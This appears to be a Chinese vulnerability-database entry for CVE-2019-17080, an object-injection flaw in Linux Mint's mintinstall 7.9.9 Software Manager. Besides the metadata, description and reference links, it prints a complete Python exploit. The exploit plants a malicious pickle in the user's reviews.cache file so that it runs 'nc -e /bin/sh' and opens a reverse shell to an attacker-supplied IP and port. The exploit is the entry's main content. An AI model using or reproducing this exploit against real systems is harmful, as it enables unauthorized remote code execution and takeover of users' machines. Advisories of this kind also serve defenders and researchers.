mintinstall 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1765219 漏洞类型 代码问题
发布时间 2019-10-03 更新时间 2020-07-27
CVE编号 CVE-2019-17080 CNNVD-ID CNNVD-201910-135
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019100010
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201910-135
|漏洞详情
mintinstall是一款软件管理器。 基于Linux Mint平台的mintinstall 7.9.9版本存在代码问题漏洞。攻击者可借助特制REVIEWS_CACHE文件利用该漏洞在系统上执行任意代码。
|漏洞EXP
# Exploit Title: mintinstall (aka Software Manager) object injection
# Date: 10/02/2019
# Exploit Author: Andhrimnirr
# Vendor Homepage: https://www.linuxmint.com/
# Software Link: mintinstall (aka Software Manager)
# Version: 7.9.9
# Tested on: Linux Mint
# CVE : CVE-2019-17080


import os
import sys
def shellCode(payload):
    with open(f"{os.getenv('HOME')}/.cache/mintinstall/reviews.cache","w") as wb:
        wb.write(payload)
    print("[+] Start mintinstall")
if __name__=="__main__":
    shellCode(f"""cos\nsystem\n(S"nc -e /bin/sh {sys.argv[1]} {sys.argv[2]}"\ntR.""")
else:
    print("[!] exploit.py [IP] [PORT]")
|参考资料

来源:github.com

链接:https://github.com/linuxmint/mintinstall/blob/master/debian/changelog


来源:github.com

链接:https://github.com/Andhrimnirr/Mintinstall-object-injection


来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2019-17080


来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/154722/mintinstall-7.9.9-Code-Execution.html


来源:www.exploit-db.com

链接:https://www.exploit-db.com/exploits/47457